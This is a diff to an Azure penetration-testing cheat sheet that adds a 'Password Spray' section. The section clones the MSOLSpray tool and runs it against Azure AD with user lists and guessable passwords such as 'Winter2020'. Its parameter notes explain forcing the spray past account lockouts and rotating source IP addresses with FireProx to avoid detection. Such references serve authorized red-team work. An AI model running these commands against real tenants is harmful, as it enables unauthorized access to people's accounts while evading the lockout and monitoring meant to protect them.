MSOL AD Spray

Methodology and Resources/Cloud - Azure Pentest.md

@@ -7,6 +7,7 @@
 * [Azure Storage Account - Access](#azure-storage-account----access)
 * [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
 * [Azure AD - Enumeration](#azure-ad---enumeration)
+* [Azure AD - Password Spray](#azure-ad---password-spray)
 * [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid)
 * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
 * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
@@ -286,6 +287,21 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online
 3. Pick the account from the active sessions
 4. Select Azure Active Directory and enjoy!
 
+## Azure AD - Password Spray
+
+```powershell
+git clone https://github.com/dafthack/MSOLSpray
+Import-Module .\MSOLSpray.ps1
+Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
+Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
+
+# UserList  - UserList file filled with usernames one-per-line in the format "user@domain.com"
+# Password  - A single password that will be used to perform the password spray.
+# OutFile   - A file to output valid results to.
+# Force     - Forces the spray to continue and not stop when multiple account lockouts are detected.
+# URL       - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from.
+```
+
 ## Azure AD - Convert GUID to SID
 
 The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id.